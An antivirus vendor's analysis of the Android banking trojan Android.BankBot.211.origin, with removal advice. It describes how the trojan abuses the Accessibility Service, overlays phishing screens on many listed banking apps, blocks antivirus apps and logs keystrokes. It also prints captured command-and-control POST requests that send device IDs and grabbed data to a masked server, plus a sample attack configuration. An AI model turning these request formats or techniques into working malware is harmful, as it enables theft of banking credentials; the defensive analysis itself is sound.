Defend what you create

Other Resources

Close

Library
My library

+ Add to library

Contact us
24/7 Tech support Rules regarding submitting

Send a message

Your tickets

Profile

Android.BankBot.211.origin

Added to Dr.Web virus database:2017-07-20
Virus description was added:2017-07-20

SHA1:

1fac76cff16887f695f557d849650cf10bcb1adb

A malicious program for Android mobile devices. Banking Trojan for Android that steals confidential information and executes cybercriminals’ commands. Android.BankBot.211.origin is distributed under the guise of benign programs.

Once installed and launched, in an infinite loop, Android.BankBot.211.origin tries to gain access to the Accessibility Service mode by blocking device operation with a window with the corresponding request.

#drweb #drweb #drweb

After the user is forced to grant the Trojan the necessary rights, Android.BankBot.211.origin adds itself to the mobile device administrator list and assigns itself as the default SMS manager and gains access to the screen capturing functions (class MediaProjection is used for this purpose). Each indicated action requires user’s consent, however, after obtaining access to the Accessibility Service, the malicious program does it automatically by independently clicking confirmation buttons.

#drweb #drweb #drweb

If the device’s owner attempts to remove the Trojan from the administrator list, Android.BankBot.211.origin will automatically click “Cancel”. In other cases, it clicks “Back” using the performGlobalAction method.

After the successful device infection, the Trojan reports this information to the command and control server by sending the request that looks the following way:

POST http://217.***.***.92/v83a59w4h/s991802.php HTTP/1.1
Content-Length: 96
Content-Type: application/x-www-form-urlencoded
Host: 217.***.***.92
Connection: Keep-Alive
action=reg&imei=86**********554&phone=&op=********&version=5.1%2C3.10.65-svn944&prefix=experience
Then it waits for the server’s commands:
POST http://217.***.***.92/v83a59w4h/s991802.php HTTP/1.1
Content-Length: 32
Content-Type: application/x-www-form-urlencoded
Host: 217.***.***.92
Connection: Keep-Alive
action=poll&imei=86**********554

The Trojan can execute the following commands:

  • number_1/prefix_1—send an SMS with the text from the parameter prefix_1 to the number from the parameter number_1;
  • call_log—forward to the server information about the installed applications, contact list and phone call data;
  • sms_history—send to the server SMS stored in the device memory;
  • url—open the specified link;
  • server—change the address of the command and control server;
  • intercept—add to the table reservas the parameters phones and obtained values of phone numbers;
  • server_poll—add to the table reservas the parameters interval and obtained values.

Besides that, Android.BankBot.211.origin intercepts and sends to the server information about all incoming messages.

The Trojan periodically connects to its command and control server using the address http://217.***.***.92/jack.zip. The archive located through the link contains an ordinary text file. Android.BankBot.211.origin can send a POST request that looks the following way:

POST http://217.***.***.92/jack.zip HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1; [device model] Build/LMY47D)
Host: 217.***.***.92
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
_AUTH=86**********554

As a response, the malicious program receives a configuration file encrypted with the AES algorithm. This file contains the parameters of the attack on the applications installed on the device. There are also names of targeted programs, link to parameters of phishing forms and the type of the executed action. Example:

config 
[
{
"name" : "lock_av",
"type" : "lock",
"link" : "no_link",
"apps" : ["com.kms.free", "com.drweb", "screenmirroring.agillaapps.com.screenmirroring", "com.huawei.android.mirrorshare", "com.antivirus", "com.eset.ems2.gp"],
"s_flow" : 1
}, {
"name" : "google_play",
"type" : "window",
"link" : "http://217.***.***.92/link/GooglePlay2/index.html",
"apps" : ["com.google.android.finsky.activities", "com.google.android.music", "com.android.vending"],
"s_flow" : 2
}, {
"name" : "Akbank",
"type" : "fullscreen",
"link" : "http://217.***.***.92/link/Akbank/index.html",
"apps" : ["com.akbank.android.apps.akbank_direkt", "com.akbank.softotp"],
"s_flow" : 2
}
]

where:

  • lock—attack on anti-virus programs and other software that can interfere with the Trojan’s operation (when such applications are launched, Android.BankBot.211.origin automatically clicks “Back”);
  • window—display of a phishing settings window of a payment service that requests bank card information;
  • fullscreen—display of a phishing window for input of login credentials during the launch of applications for operation with mobile banking and payment systems.

The Trojan displays phishing input forms during the launch of the following applications:

  • com.akbank.android.apps.akbank_direkt – Akbank Direkt;
  • com.akbank.softotp – Akbank Direkt Şifreci;
  • com.finansbank.mobile.cepsube – QNB Finansbank Cep Şubesi;
  • com.garanti.cepsubesi – Garanti Mobile Banking;
  • com.garanti.cepbank – Garanti CepBank;
  • biz.mobinex.android.apps.cep_sifrematik – Garanti Cep Şifrematik;
  • com.pozitron.iscep – İşCep;
  • com.ykb.android – Yapı Kredi Mobile;
  • com.ziraat.ziraatmobil – Ziraat Mobil;
  • com.dbs.sg.dbsmbanking – DBS digibank SG;
  • com.dbs.sg.posbmbanking – POSB digibank SG;
  • com.dbs.dbspaylah – DBS PayLah!;
  • com.dbshk – DBS mBanking Hong Kong;
  • com.dbs.businessclass – DBS BusinessClass;
  • com.dbs.quickcredit.sg – DBS Quick Credit;
  • de.comdirect.android – comdirect mobile App;
  • de.commerzbanking.mobil – Commerzbank Banking App;
  • de.consorsbank – Consorsbank;
  • com.db.mm.deutschebank – Meine Bank;
  • de.dkb.portalapp – DKB-Banking;
  • com.ing.diba.mbbr2 – ING-DiBa Banking + Brokerage;
  • de.postbank.finanzassistent – Postbank Finanzassistent;
  • mobile.santander.de – Santander MobileBanking;
  • com.starfinanz.smob.android – Sparkasse;
  • de.fiducia.smartphone.android.banking.vr – VR-Banking;
  • pl.mbank – mBank PL;
  • eu.eleader.mobilebanking.pekao – Bank Pekao;
  • pl.pkobp.iko – IKO;
  • com.comarch.mobile – Alior Mobile;
  • com.getingroup.mobilebanking – Getin Mobile;
  • pl.ing.ingmobile – INGMobile;
  • pl.ing.mojeing – Moje ING mobile;
  • org.banksa.bank – BankSA Mobile Banking;
  • com.ifs.banking.fiid3767 – BANKWEST OF KANSAS;
  • com.commbank.netbank – CommBank;
  • com.cba.android.netbank – CommBank app for tablet;
  • au.com.ingdirect.android – ING DIRECT Australia Banking;
  • au.com.nab.mobile – NAB;
  • org.stgeorge.bank – St.George Mobile Banking;
  • org.banking.tablet.stgeorge – St.George Tablet Banking;
  • org.westpac.bank – Westpac Mobile Banking;
  • fr.creditagricole.androidapp – Ma Banque;
  • fr.axa.monaxa – Mon AXA;
  • fr.banquepopulaire.cyberplus – Banque Populaire;
  • net.bnpparibas.mescomptes – Mes Comptes BNP Paribas;
  • com.boursorama.android.clients – Boursorama Banque;
  • com.caisseepargne.android.mobilebanking – Banque;
  • fr.lcl.android.customerarea – Mes Comptes – LCL pour mobile;
  • mobi.societegenerale.mobile.lappli – L'Appli Société Générale;
  • uk.co.bankofscotland.businessbank – Bank of Scotland Business;
  • com.grppl.android.shell.BOS – Bank of Scotland Mobile Bank;
  • com.barclays – Barclays Mobile Banking;
  • com.grppl.android.shell.halifax – Halifax Mobile Banking app;
  • com.htsu.hsbcpersonalbanking – HSBC Mobile Banking;
  • com.grppl.android.shell.CMBlloydsTSB73 – Lloyds Bank Mobile Banking;
  • com.lloydsbank.businessmobile – Lloyds Bank Business;
  • santander – Santander;
  • com.ifs.banking.fiid4202 – TSBBank Mobile Banking;
  • com.fi6122.godough – TSB Mobile;
  • com.rbs.mobile.android.ubr – Ulster Bank ROI;
  • com.rbs.mobile.android.natwestoffshore – NatWest Offshore;
  • com.rbs.mobile.android.natwest – NatWest;
  • com.rbs.mobile.android.natwestbandc – NatWest Business Banking;
  • com.speedway.mobile – Speedway Fuel & Speedy Rewards;
  • com.paypal.android.p2pmobile – PayPal;
  • com.ebay.mobile – eBay;
  • com.google.android.music – Google Play Music;
  • com.android.vending – Google Play.

Android.BankBot.211.origin interferes with the operation of the following programs:

  • com.drweb – Dr.Web Security Space;
  • com.kms.free – Kaspersky Mobile Antivirus;
  • screenmirroring.agillaapps.com.screenmirroring – Screen Mirroring Assistant;
  • com.huawei.android.mirrorshare –无线分享;
  • com.antivirus – AVG AntiVirus;
  • com.eset.ems2.gp – ESET32 – ESET Mobile Security & Antivirus.

Examples of the fraudulent input forms and phishing windows Android.BankBot.211.origin can display:

#drweb #drweb #drweb
#drweb #drweb #drweb

The Trojan collects information about all launched applications and user’s actions performed within them. To do that, it tracks the following AccessibilityEvent events:

  • TYPE_VIEW_TEXT_CHANGED;
  • TYPE_VIEW_FOCUSED;
  • TYPE_VIEW_LONG_CLICKED;
  • TYPE_NOTIFICATION_STATE_CHANGED;
  • TYPE_VIEW_SELECTED;
  • TYPE_WINDOW_STATE_CHANGED;
  • TYPE_VIEW_CLICKED.

It allows the malicious program to track available text fields in programs, such as menu elements, it can also log key strokes and other components of the user interface. The obtained data is sent to the command and control server. Example of the sent information:

POST http://217.***.***.92/v83a59w4h/s991802.php HTTP/1.1
Content-Length: 708
Content-Type: application/x-www-form-urlencoded
Host: 217.***.***.92
Connection: Keep-Alive
action=grabbed_data&imei=86**********554&data={"app":"com.sprd.fileexplorer","report":"Grabbed: com.sprd.fileexplorer\nState: TYPE_WINDOW_STATE_CHANGED\nData: [radio] Быстрый просмотр\n[text] Аудио\n[text] Изображения\n[text] Видео\n[text] Документация\n[text] Приложения\n[text] \/storage\/emulated\/0\n[text] Alarms\n[text] Дата:2015-01-01 03:16:44\n[text] Android\n[text] Дата:2015-01-01 03:17:07\n[text] com.kingroot.kinguser\n[text] Дата:2017-07-11 13:27:37\n[text] DCIM\n[text] Дата:2017-07-11 13:27:45\n[text] documents\n[text] Дата:2017-07-07 14:09:51\n[text] Download\n[text] Дата:2017-07-13 12:27:54\n[text] Fonts\n[text] Дата:2017-07-12 18:33:49\n[text] Kingroot\n[text] Дата:2017-07-07 14:34:11"}

Besides that, Android.BankBot.211.origin tracks the operation of keyboard and steals the input user’s data. On each key stroke, the Trojan makes a screenshot and sends the obtained images to the command and control server. It allows malicious program to steal passwords as well, and it is quick enough to save them before they are hidden. Data which is input via visible fields is duplicated in the sent POST request.

#drweb #drweb

The Trojan prevents its removal and doesn’t allow to disable the access to its obtained extended functions. To get rid of Android.BankBot.211.origin, it is necessary to perform the following actions:

  • Load an infected device in safe mode;
  • Log into system settings and go to the list of administrators;
  • Find the Trojan in this list and recall the corresponding rights (here Android.BankBot.211.origin will display a warning about the inevitable loss of all important data, but it is only a decoy);
  • Restart the device, perform its full scan with an anti-virus and remove the Trojan after the scanning is complete.

News about the Trojan

Curing recommendations


Android

  1. If the mobile device is operating normally, download and install Dr.Web for Android Light. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web для Android Light onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android

The Russian developer of Dr.Web anti-viruses

Doctor Web has been developing anti-virus software since 1992

Dr.Web is trusted by users around the world in 200+ countries

The company has delivered an anti-virus as a service since 2007

24/7 tech support

© Doctor Web
2003 — 2018

Doctor Web is the Russian developer of Dr.Web anti-virus software. Dr.Web anti-virus software has been developed since 1992.

2-12А, 3rd street Yamskogo polya, Moscow, Russia, 125040